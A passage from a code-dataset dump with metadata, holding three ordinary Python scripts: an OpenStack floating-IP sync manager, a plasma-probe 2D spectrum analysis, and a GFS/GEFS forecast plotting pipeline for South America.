ClientManager().keystone_client)\nif KEYSTONE_CLI.service_catalog.get_endpoints(service_type='network'):\n NEUTRON_CLI = SimpleProxy(lambda: ClientManager().neutron_client)\n\nNOVA_CLI = SimpleProxy(lambda: ClientManager().nova_client)\n\n# get resource managers\n# SERVERS = SimpleProxy(lambda: NOVA_CLI.servers)\n# FLOATING_IPS = SimpleProxy(lambda: NOVA_CLI.floating_ips)\n\n\nclass LocalFloatingIpManager(SingletonMixin):\n \"\"\"Local floating ip manager.\"\"\"\n\n # _stop_flag = False\n\n # def start_sync(self):\n # LOG.info('Start local floating ip table refreshing thread')\n # self.refresh_thread = threading.Thread(target=self.loop_refresh)\n # self.refresh_thread.start()\n\n # def stop_sync(self):\n # self._stop_flag = True\n\n def allocate_ip(self, external_net_id):\n if NEUTRON_CLI:\n ip = db.allocate_floating_ip(external_net_id)\n if not ip:\n body = {\n 'floatingip': {'floating_network_id': external_net_id}\n }\n result = NEUTRON_CLI.create_floatingip(body)\n new_floating_ip = result['floatingip']\n floating_ip_id = new_floating_ip['id']\n floating_ip_address = new_floating_ip['floating_ip_address']\n\n # add to floating ip table\n new_ip = FloatingIp()\n new_ip.ip_address = new_floating_ip['floating_ip_address']\n new_ip.external_network_id = new_floating_ip['floating_network_id']\n new_ip.ref_id = new_floating_ip['id']\n new_ip.status = FloatingIp.IP_STATUS.ACTIVE\n db.create_floating_ip(new_ip)\n else:\n floating_ip_id = ip.ref_id\n floating_ip_address = ip.ip_address\n return {'address': floating_ip_address,\n 'id': floating_ip_id}\n else:\n ip = db.allocate_floating_ip(external_net_id)\n if not ip:\n new_floating_ip = NOVA_CLI.floating_ips.create()\n new_ip = FloatingIp()\n new_ip.ip_address = new_floating_ip.ip\n new_ip.external_network_id = new_floating_ip.pool\n new_ip.ref_id = new_floating_ip.id\n 
new_ip.status = FloatingIp.IP_STATUS.ACTIVE\n db.create_floating_ip(new_ip)\n\n floating_ip_id = new_floating_ip.id\n floating_ip_address = new_floating_ip.ip\n else:\n floating_ip_id = ip.ref_id\n floating_ip_address = ip.ip_address\n return {'address': floating_ip_address,\n 'id': floating_ip_id}\n\n def reclaim_ip(self, ip):\n db.reclaim_floating_ip(ip)\n\n # def loop_refresh(self, frequency=10):\n # while not self._stop_flag:\n # self.refresh()\n # time.sleep(frequency)\n\n def refresh(self):\n if NEUTRON_CLI:\n db.delete_all_floating_ip()\n server_ips = NEUTRON_CLI.list_floatingips()\n for ip in server_ips['floatingips']:\n new_ip = FloatingIp()\n new_ip.ip_address = ip['floating_ip_address']\n new_ip.external_network_id = ip['floating_network_id']\n new_ip.ref_id = ip['id']\n new_ip.status = ip['status'].lower()\n db.create_floating_ip(new_ip)\n\n # server_ips_dict = {}\n # server_ips = NEUTRON_CLI.list_floatingips()\n # for ip in server_ips['floatingips']:\n # server_ips_dict[ip['floating_ip_address']] = ip\n #\n # local_ips_dict = {}\n # local_ips = db.get_all_floating_ips()\n # for ip in local_ips:\n # local_ips_dict[ip.ip_address] = ip\n #\n # # remove not ip in server\n # for ip in local_ips:\n # if not server_ips_dict.get(ip.ip_address, None):\n # db.delete_floating_ip(ip.id)\n #\n # # add ip new in server\n # for ip in server_ips['floatingips']:\n # if not local_ips_dict.get(ip['floating_ip_address'], None):\n # new_ip = FloatingIp()\n # new_ip.ip_address = ip['floating_ip_address']\n # new_ip.external_network_id = ip['floating_network_id']\n # new_ip.ref_id = ip['id']\n # new_ip.status = ip['status'].lower()\n # db.create_floating_ip(new_ip)\n else:\n db.delete_all_floating_ip()\n server_ips = NOVA_CLI.floating_ips.findall()\n for ip in server_ips:\n new_ip = FloatingIp()\n new_ip.ip_address = ip.ip\n new_ip.external_network_id = ip.pool\n new_ip.ref_id = ip.id\n new_ip.status = 'active' if ip.fixed_ip else 'down'\n db.create_floating_ip(new_ip)\n\n\n def clean(self):\n db.delete_all_floating_ip()\n\nfloating_ip_manager = LocalFloatingIpManager()\n\n# if __name__ == '__main__':\n# floating_ip_manager.clean()\n# floating_ip_manager.start_sync()\n", "sub_path": "src/phoenix/cloud/openstack/sync_openstack.py", "file_name": "sync_openstack.py", "file_ext": "py", "file_size_in_byte": 5771, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "phoenix.common.proxy.SimpleProxy", "line_number": 30, "usage_type": "call"}, {"api_name": "phoenix.cloud.openstack.client.ClientManager", "line_number": 30, "usage_type": "call"}, {"api_name": "phoenix.common.proxy.SimpleProxy", "line_number": 32, "usage_type": "call"}, {"api_name": "phoenix.cloud.openstack.client.ClientManager", "line_number": 32, "usage_type": "call"}, {"api_name": "phoenix.common.proxy.SimpleProxy", "line_number": 34, "usage_type": "call"}, {"api_name": "phoenix.cloud.openstack.client.ClientManager", "line_number": 34, "usage_type": "call"}, 
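The LocalFloatingIpManager above follows a reuse-or-create pattern; here is a distilled sketch with the database and network client stubbed out (`db` and `client` are stand-ins for the phoenix DB layer and the neutron client, not real objects):

```python
# Distilled reuse-or-create pattern from LocalFloatingIpManager.allocate_ip.
def allocate(db, client, external_net_id):
    ip = db.allocate_floating_ip(external_net_id)       # try a reclaimed IP first
    if ip:
        return {'address': ip.ip_address, 'id': ip.ref_id}
    body = {'floatingip': {'floating_network_id': external_net_id}}
    new = client.create_floatingip(body)['floatingip']  # fall back to the server
    return {'address': new['floating_ip_address'], 'id': new['id']}
```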
{"api_name": "phoenix.common.singleton.SingletonMixin", "line_number": 41, "usage_type": "name"}, {"api_name": "phoenix.db.allocate_floating_ip", "line_number": 56, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 56, "usage_type": "name"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 67, "usage_type": "call"}, {"api_name": "phoenix.db.models.FloatingIp.IP_STATUS", "line_number": 71, "usage_type": "attribute"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 71, "usage_type": "name"}, {"api_name": "phoenix.db.create_floating_ip", "line_number": 72, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 72, "usage_type": "name"}, {"api_name": "phoenix.db.allocate_floating_ip", "line_number": 79, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 79, "usage_type": "name"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 82, "usage_type": "call"}, {"api_name": "phoenix.db.models.FloatingIp.IP_STATUS", "line_number": 86, "usage_type": "attribute"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 86, "usage_type": "name"}, {"api_name": "phoenix.db.create_floating_ip", "line_number": 87, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 87, "usage_type": "name"}, {"api_name": "phoenix.db.reclaim_floating_ip", "line_number": 98, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 98, "usage_type": "name"}, {"api_name": "phoenix.db.delete_all_floating_ip", "line_number": 107, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 107, "usage_type": "name"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 110, "usage_type": "call"}, {"api_name": "phoenix.db.create_floating_ip", "line_number": 115, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 115, "usage_type": "name"}, {"api_name": "phoenix.db.delete_all_floating_ip", "line_number": 142, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 142, "usage_type": "name"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 145, "usage_type": "call"}, {"api_name": "phoenix.db.create_floating_ip", "line_number": 150, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 150, "usage_type": "name"}, {"api_name": "phoenix.db.delete_all_floating_ip", "line_number": 154, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "231320510", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport kawa.daq as dq\nimport kawa.spectrum as ksp\nimport matplotlib.pyplot as pl\nimport numpy as np\nimport pandas as pd\nimport scipy.signal as ss\nimport os\nos.chdir(\"/Users/yuichi/exp/\")\ndef read2d_64(shot,subno,kind = \"Iis\"):\n fid = dq.pantaADC()\n refpath = \"/Users/yuichi/KYTHON/ref/\"\n datapath = \"/Users/yuichi/data/\"\n dagfile = pd.read_csv(refpath + \"64ch.dag\",dtype = str,comment = \"#\")\n dt = 1e-6\n edge1 = int( 0.24 /dt) # dt * index = 0.24 <=> index = 0.24/dt\n edge2 = int( 0.54 /dt)\n count = -1\n if kind == \"Iis\":\n start = 0\n elif kind == \"Vf\":\n start = 1\n for i in range(start,64,2): #i == 0 => ch1 => Iis is odd num. 
\n count += 1\n if count == 0:\n signal,time = fid.read(shot = shotno, subshot = subno ,\n tower = dagfile.loc[i,\"tower\" ].strip(),\n station = dagfile.loc[i,\"station\"].strip(),\n ch = dagfile.loc[i,\"ch\" ].strip(),\n dir=datapath, samplingtime=True,\n start = edge1, end = edge2)\n #signal = signal-np.mean(signal)\n #signal = ksg.low_pass(signal,fs = 1e6, fcut =12e3,order = 5)\n if kind == \"Vf\":\n signal = 20 * signal\n df = pd.DataFrame(signal)\n else:\n signal = fid.read(shot = shotno, subshot = subno ,\n tower = dagfile.loc[i,\"tower\" ].strip(),\n station = dagfile.loc[i,\"station\"].strip(),\n ch = dagfile.loc[i,\"ch\" ].strip(),\n dir=datapath, samplingtime=False,\n start = edge1, end = edge2)\n #signal = signal-np.mean(signal)\n #signal = ksg.low_pass(signal,fs = 1e6, fcut =12e3,order = 5)\n if kind == \"Vf\":\n signal = 20 * signal\n df[count] = signal\n phase = np.linspace(0,1,32)\n return phase,time,df\n\n\nrf_list = np.arange(22,62,2)/10\nnum = np.arange(75,95)\ncount = -1\nvi = \"Iis\"\ntarget = 1\nlist2 = []\nfor i in num:\n count +=1\n print(rf_list[count])\n shotno = \"1053\" +str(i)\n for j in [\"003\"]:#,\"002\",\"003\"]:\n subno = j\n phase,time,df = read2d_64(shotno,subno,kind = vi)\n means = np.mean(df,axis = 1)\n #Iis\n if vi == \"Iis\":\n df = ((df.T - means)/means).T\n #Vf\n elif vi == \"Vf\":\n df = ((df.T - means)).T\n\n f,m,pfm = ksp.psd2d(df,time,nfft = 2**14,nensemble = 35)\n f/=1000\n \n import kawa.myplot as my\n fig = pl.figure()\n my.contourf_log(f,m,pfm,12,cmin = 1e-8,cmax = 1e-4)\n cbar = my.cbar_log(cmin = 1e-8,cmax = 1e-4)\n pl.xlim(0,12)\n pl.ylim(-2,6)\n pl.ylabel(\"Azimuthal mode number m\")\n pl.xlabel(\"frequency (kHz)\")\n pl.title(\"{}kW {}\".format(rf_list[count],vi))\n\n\n indm1 = np.argmin(abs(m-1))\n indf1 = np.argmax(pfm[indm1,f.size//2 + 4:])\n f1 = f[indf1 + f.size//2 + 4]\n y = np.arange(1,7)\n x = 1.55 * y\n pl.plot(x,y,\".k--\",markersize = 15)\n #pl.show()\n fig.savefig(\"{}kW PSD2D {}.png\".format(rf_list[count],vi))\n \n\n # Ranges = 6\n # #log ticks generate \n # lv = np.logspace( int(np.log10(power.max())) - Ranges, np.log10(power.max()) ,50)\n # import matplotlib.colors as mc\n # ticks = [10 ** int(np.log10(power.max()))]\n # for k in range(Ranges): \n # ticks.append(ticks[k] *10**-1)\n # pl.contourf(f,m, power, cmap = \"jet\", norm=mc.LogNorm(),levels = lv)\n \n # cbar = pl.colorbar()\n # cbar.set_ticks(ticks)\n # #pl.yscale(\"log\")\n # pl.ylim(-16,16)\n # pl.xlim(0,20)\n # pl.xlabel(\"frequency (kHz)\", fontsize = 15)\n # pl.ylabel(\"Azimuthal mode number\", fontsize = 15)\n # pl.show()\n", "sub_path": "sub/PSD2d.py", "file_name": "PSD2d.py", "file_ext": "py", "file_size_in_byte": 3875, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.chdir", "line_number": 10, "usage_type": "call"}, {"api_name": "kawa.daq.pantaADC", "line_number": 12, "usage_type": "call"}, {"api_name": "kawa.daq", "line_number": 12, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 67, "usage_type": "call"}, {"api_name": "kawa.spectrum.psd2d", "line_number": 75, "usage_type": "call"}, {"api_name": 
"kawa.spectrum", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "kawa.myplot.contourf_log", "line_number": 80, "usage_type": "call"}, {"api_name": "kawa.myplot", "line_number": 80, "usage_type": "name"}, {"api_name": "kawa.myplot.cbar_log", "line_number": 81, "usage_type": "call"}, {"api_name": "kawa.myplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "numpy.argmin", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}]} +{"seq_id": "4760989", "text": "#!usr/bin/python\n\nfrom __future__ import print_function, division\nfrom datetime import datetime\nimport numpy as np\nfrom datetime import datetime, timedelta\nfrom netCDF4 import Dataset, num2date\nfrom siphon.catalog import TDSCatalog\nfrom siphon.ncss import NCSS\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n#plt.style.use('ncar_wrf_plots')\nplt.style.use('ggplot')\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport matplotlib.gridspec as gridspec\nfrom color_maker.color_maker import color_map\nfrom matplotlib import cm\nimport os\nfrom scipy.ndimage.filters import gaussian_filter\nfrom os import environ as EV\n\nos.chdir('/home/disk/meso-home/bzim/relampago')\n\ncormenlat = (-31.42,-32.89)\ncormenlon = (-64.18,-68.84)\nexportdir = '/home/disk/user_www/bzim/relampago'\nvariables_gfs = {'Precipitable_water_entire_atmosphere_single_layer' : ('Precipitable Water','mm','pwat',(0,35),'ncar_moist'),\n 'Precipitation_rate_surface_Mixed_intervals_Average' : ('Total Precipitation Rate','mm/hr','precip',(0,10), 'ncar_precip'),\n'Apparent_temperature_height_above_ground' : ('2m Temperature', 'degK', '2mtemp', (260, 312), 'ncar_temp'),\n'Relative_humidity_height_above_ground' : ('2m Relative Humidity', '%', '2mRH', (0, 100), 'MPL_RdBu'),\n'Convective_available_potential_energy_surface': ('Surface CAPE', 'J/Kg', 'cape', (0, 4000), 'ncar_ua')\n }\n\n# Spread variables need to have a range,\n# Mean variables need to have a tuple\nvariables_gefs = {'Convective_available_potential_energy_pressure_difference_layer_unweightedMean' :\n ('CAPE','J/kg','cape',(0,4000,100),'ncar_ua'),\n 'Convective_available_potential_energy_pressure_difference_layer_stdDev' :\n ('CAPE','J/kg','cape',np.arange(0,600), 'ncar_precip'),\n 
'Total_precipitation_surface_6_Hour_Accumulation_unweightedMean' :\n ('6-hr Precipitation','mm','precip06',(0,30,1), 'ncar_precip'),\n 'Total_precipitation_surface_6_Hour_Accumulation_stdDev' :\n ('6-hr Precipitation','mm','precip06',np.arange(15), 'ncar_precip'),\n 'Pressure_reduced_to_MSL_msl_unweightedMean' :\n ('Sea-Level Pressure','hPa','slp',(940,1060, 4), 'ncar_precip'),\n 'Pressure_reduced_to_MSL_msl_stdDev' :\n ('Sea-Level Pressure Sprd',\n 'hPa','slp',np.arange(20),'WhBlGrYeRe'),\n 'Geopotential_height_isobaric_unweightedMean' :\n ('500 hPa Height','m','hgt500',(5400,6060, 60), 'ncar_precip'),\n 'Geopotential_height_isobaric_stdDev' :\n ('500 hPa Height Spread','m','hgt500',np.arange(30), 'ncar_precip'),\n 'Relative_humidity_height_above_ground_unweightedMean' :\n ('2m Relative Humidity', '%', '2mRH', (0, 100, 5), 'ncar_wv'),\n 'Relative_humidity_height_above_ground_stdDev' :\n ('2m Relative Humidity Spread', '%', '2mRH', np.arange(20), 'ncar_wv'),\n 'Temperature_height_above_ground_unweightedMean' :\n ('2m Temperature', 'degK', '2mtemp', (-15, 40, 1), 'ncar_temp'),\n 'Temperature_height_above_ground_stdDev' :\n ('2m Temperature Spread', 'degK', '2mtemp', np.arange(5), 'ncar_temp'),\n\n\n }\n\n\n\n\n\ndef get_gfs(type='hires', bounds=(-72.0, -54.5, -37.0, -26.25)):\n if type == 'hires':\n best_gfs = TDSCatalog('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/GFS/Global_0p25deg/latest.xml')\n elif type=='ensemble':\n best_gfs = TDSCatalog('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/GEFS/Global_1p0deg_Ensemble/derived/latest.xml')\n\n best_ds = list(best_gfs.datasets.values())[0]\n ncss = NCSS(best_ds.access_urls['NetcdfSubset'])\n query = ncss.query()\n # West east south north\n query.lonlat_box(*bounds)\n query.accept('netcdf4')\n query.time_range(datetime.utcnow(), datetime.utcnow()+timedelta(days=5))\n if type=='hires':\n query.variables(*((variables_gfs.keys())))\n elif type=='ensemble':\n query.variables(*((variables_gefs.keys())))\n data = ncss.get_data(query)\n return data\n\n\n\n\n\ndef get_terrain(terrfile='/home/disk/meso-home/bzim/relampago/geo_em.d01.nc'):\n \"\"\"\n Loads terrain height from WRF file\n \"\"\"\n from scipy.ndimage.filters import gaussian_filter\n from netCDF4 import Dataset\n with Dataset(terrfile,'r') as dset:\n lats = dset.variables['XLAT_M'][0]\n lons = dset.variables['XLONG_M'][0]\n hgt = dset.variables['HGT_M'][0]\n xhgt, yhgt = m(lons, lats)\n hgt = gaussian_filter(hgt, 1)\n return xhgt, yhgt, hgt\n\n\n# In[146]:\n\ndef make_plot(pltdat, export=False):\n gs = gridspec.GridSpec(2,2,height_ratios=(25,1))\n plt.figure(figsize=(10,8))\n plt.subplot(gs[0,:])\n\n if pltdat['pltcode'] == 'precip':\n pltdat['field'] = pltdat['field'] * 3600.0\n if pltdat['pltcode'] in ['slp','hgt500', 'hgt250', 'hgt925']:\n print(pltdat['field'].min(), pltdat['field'].max())\n print(pltdat['contourfield'].min(), pltdat['contourfield'].max())\n lw=2\n else:\n lw=2\n if pltdat['pltcode'] == '2mtemp':\n key = 'contourfield' if pltdat['modelname'] == 'GEFS' else 'field'\n pltdat[key] = pltdat[key]- 273.15\n\n if 'contourfield' in pltdat.keys():\n spreadfield = gaussian_filter(pltdat['contourfield'],1)\n lines = plt.contour(x,y,spreadfield, np.arange(pltdat['contourlevs'][0], pltdat['contourlevs'][1], pltdat['contourlevs'][2]), linewidths=lw, colors = 'k')\n clabels = plt.clabel(lines, fmt='%2.0f')\n\n if pltdat['modelname']=='GEFS':\n theplot = plt.pcolormesh(x,y,pltdat['field'], vmin=pltdat['range'][0], vmax=pltdat['range'][-1], cmap=color_map('WhBlGrYeRe'))\n elif 
pltdat['modelname']=='GFS':\n theplot = plt.pcolormesh(x,y,pltdat['field'], vmin=pltdat['range'][0], vmax=pltdat['range'][-1], cmap=pltdat['cmap'])\n # OLD theplot = plt.pcolormesh(x,y,pltdat['field'], vmin=pltdat['range'][0], vmax=pltdat['range'][1], cmap=pltdat['cmap'])\n # Highlight key sites\n plt.scatter(xpt, ypt, s=100, marker='s', facecolor='Firebrick', edgecolor='white')\n\n # Contour terrain\n if pltdat['plot terrain']:\n plt.contour(xhgt, yhgt, hgt, np.arange(500,4000,500), linewidths=1, colors='0.4')\n m.drawcoastlines(linewidth=2)\n m.drawcountries(linewidth=2)\n m.drawstates(linewidth=1, color='0.8')\n parallels = np.arange(-60,-5, 5)\n meridians = np.arange(-120,-30, 5)\n m.drawparallels(parallels,labels=[False,True,True,False])\n m.drawmeridians(meridians,labels=[True,False,True,False])\n\n tax = plt.subplot(gs[1,0])\n plt.text(0,0.75, '{modelname:s} {varname:s}'.format(**pltdat), fontsize=16, ha='left', va='center', transform=tax.transAxes)\n plt.text(0,0.00, 'Valid: {valid:%d %b %H00 UTC} | Init: {init:%d %b %H00 UTC}'.format(**pltdat), fontsize=12, ha='left', va='center', transform=tax.transAxes)\n plt.text(1.0, 0.75, 'F{flead:03d}'.format(**pltdat), fontsize=16, ha='right', va='center', transform=tax.transAxes)\n #plt.text(0,-0.75, 'Init: {init: %d %b %H00 UTC}'.format(**pltdat), fontsize=18, ha='left', va='center', transform=tax.transAxes)\n tax.axis('off')\n\n cax = plt.subplot(gs[1,1])\n cbar = plt.colorbar(theplot, cax=cax, orientation='horizontal')\n cbar.set_label(label='{varname:s} [{varunit:s}]'.format(**pltdat), fontsize=12)\n cax.tick_params(labelsize=18)\n plt.tight_layout()\n if export:\n outpath = '{:s}/{:s}/{:%Y%m%d%H}'.format(exportdir,pltdat['modelname'].lower(), pltdat['init'])\n filename = '{pltcode:s}_{valid:%Y%m%d%H}_f{flead:03d}.png'.format(**pltdat)\n\n # filenames for ftp files, add AR to the model name\n outpath2= EV['HOME']+'/relampago/ftp_gifs'\n filename2= 'model.{modelname:s}_AR.{init:%Y%m%d%H%M}.{flead:03d}_{pltcode:s}.png'.format(**pltdat)\n\n if not os.path.exists(outpath):\n os.system('mkdir {:s}'.format(outpath))\n\n plt.savefig(filename, bbox_inches='tight')\n os.system('mv {:s} {:s}'.format(filename, outpath))\n\n if not os.path.exists(outpath2):\n os.system('mkdir {:s}'.format(outpath2))\n print(filename2)\n plt.savefig(filename2, bbox_inches='tight')\n os.system('mv {:s} {:s}'.format(filename2, outpath2))\n os.system('convert {:s}/{:s} {:s}/{:s}'.format(outpath2, filename2, outpath2, filename2[:-3]+'gif'))\n os.system('rm {:s}/{:s}'.format(outpath2, filename2))\n plt.close()\n\n #from ftplib import FTP\n #ftp = FTP('catalog.eol.ucar.edu', 'anonymous', 'bzim@uw.edu')\n #ftp.cwd('pub/incoming/catalog/relampago')\n #with open('{:s}/{:s}'.format(outpath2, filename2) as f:\n # ftp.storbinary('STOR {:s}'.format(filename2), f)\n #ftp.quit()\n\n else:\n plt.show()\n\nif __name__ == '__main__':\n\n # now for the ensemble\n # Also get lat/lon bounds\n ensbounds = (-110.0, -46.0, -50.0, -11.0)\n m = Basemap(projection='merc', llcrnrlon=ensbounds[0],\n urcrnrlon=ensbounds[1], llcrnrlat=ensbounds[2],\n urcrnrlat=ensbounds[3], resolution='l', area_thresh=5000)\n\n #xhgt, yhgt, hgt = get_terrain()\n\n data = get_gfs(type='ensemble', bounds=ensbounds)\n glon, glat = np.meshgrid(data.variables['lon'][:]-360, data.variables['lat'][:])\n x,y = m(glon, glat)\n xpt, ypt = m(cormenlon, cormenlat)\n\n if 'time1' in data.variables.keys():\n timevar = 'time1'\n elif 'time2' in data.variables.keys():\n timevar = 'time2'\n elif 'time8' in 
data.variables.keys():\n timevar = 'time8'\n else:\n timevar = 'time'\n times = num2date(data.variables[timevar][:], units = data.variables[timevar].units)\n for n,time in enumerate(times):\n #if n !=0:\n # continue\n print(time)\n flead = data.variables[timevar][n]\n init = time - timedelta(hours=flead)\n print(init)\n #print(init)\n for fullvar, varcodes in variables_gefs.items():\n if fullvar.endswith('stdDev'):\n continue\n varpts = fullvar.split('_')\n varpts[-1] = 'stdDev'\n stdevvar = '_'.join(varpts)\n\n print(' ', varcodes[2])\n\n if varcodes[2] in ['slp']:\n # Contour the mean\n meanlevs = varcodes[3]\n varcodes = variables_gefs[stdevvar]\n plotdata = {\n 'field' : np.squeeze(data.variables[stdevvar][n]/100.0),\n 'contourfield' : np.squeeze(data.variables[fullvar][n]/100.0),\n 'contourlevs' : meanlevs,\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GEFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : varcodes[2],\n 'range' : varcodes[3],\n 'plot terrain' : False,\n }\n make_plot(plotdata, export=True)\n\n elif varcodes[2].startswith('hgt'):\n #print(data.variables[fullvar])\n #import pdb; pdb.set_trace()\n for level in ['500']:\n try:\n isolevs = data.variables['isobaric1'][:]\n except:\n isolevs = data.variables['isobaric2'][:]\n thislev = int(level)*100\n hdex = np.argmax(isolevs >= thislev)\n #print(isolevs[hdex])\n #exit()\n # Contour the mean\n meanlevs = varcodes[3]\n varcodes = variables_gefs[stdevvar]\n plotdata = {\n 'field' : np.squeeze(data.variables[stdevvar][n, hdex]),\n 'contourfield' : np.squeeze(data.variables[fullvar][n, hdex]),\n 'contourlevs' : meanlevs,\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GEFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : varcodes[2],\n 'range' : varcodes[3],\n 'plot terrain' : False,\n }\n \"\"\"plotdata = {\n 'field' : np.squeeze(data.variables[stdevvar][n,hdex]),\n 'contourfield' : np.squeeze(data.variables[fullvar][n,hdex]),\n 'contourlevs' : meanlevs,\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GEFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : 'hgt' + level,\n 'range' : datarange,\n 'plot terrain' : False,\n }\"\"\"\n make_plot(plotdata, export=True)\n\n else:\n # Contour the mean\n meanlevs = varcodes[3]\n varcodes = variables_gefs[stdevvar]\n plotdata = {\n 'field' : np.squeeze(data.variables[stdevvar][n]),\n 'contourfield' : np.squeeze(data.variables[fullvar][n]),\n 'contourlevs' : meanlevs,\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GEFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : varcodes[2],\n 'range' : varcodes[3],\n 'plot terrain' : False,\n }\n \"\"\"\n # Contour the stdev\n plotdata = {\n 'field' : np.squeeze(data.variables[fullvar][n]),\n 'contourfield' : np.squeeze(data.variables[stdevvar][n]),\n 'contourlevs' : variables_gefs[stdevvar][3],\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GEFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : varcodes[2],\n 'range' : varcodes[3],\n 'plot terrain' : False,\n }\n \"\"\"\n make_plot(plotdata, export=True)\n\n\n # First, hires\n bounds=(-110.0, -46.0, -50.0, -11.0)\n m = Basemap(projection='merc', llcrnrlon=bounds[0], 
urcrnrlon=bounds[1], llcrnrlat=bounds[2], urcrnrlat=bounds[3], resolution='l', area_thresh=5000)\n\n xhgt, yhgt, hgt = get_terrain()\n data = get_gfs(type='hires', bounds=bounds)\n glon, glat = np.meshgrid(data.variables['lon'][:]-360, data.variables['lat'][:])\n x,y = m(glon, glat)\n xpt, ypt = m(cormenlon, cormenlat)\n\n if 'time1' in data.variables.keys():\n timevar = 'time1'\n elif 'time2' in data.variables.keys():\n timevar = 'time2'\n elif 'time8' in data.variables.keys():\n timevar = 'time8'\n else:\n timevar = 'time'\n\n times = num2date(data.variables[timevar][:], units = data.variables[timevar].units)\n for n,time in enumerate(times):\n #if n !=0:\n # continue\n print(time)\n flead = data.variables[timevar][n]\n init = time - timedelta(hours=flead)\n print(init)\n #print(init)\n for fullvar, varcodes in variables_gfs.items():\n print(' ', varcodes[2])\n plotdata = {\n 'field' : data.variables[fullvar][n].squeeze(),\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : varcodes[2],\n 'range' : varcodes[3],\n 'plot terrain' : True,\n }\n make_plot(plotdata, export=True)\n", "sub_path": "gfs_hires_plots.py", "file_name": "gfs_hires_plots.py", "file_ext": "py", "file_size_in_byte": 16405, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 14, "usage_type": "attribute"}, {"api_name": 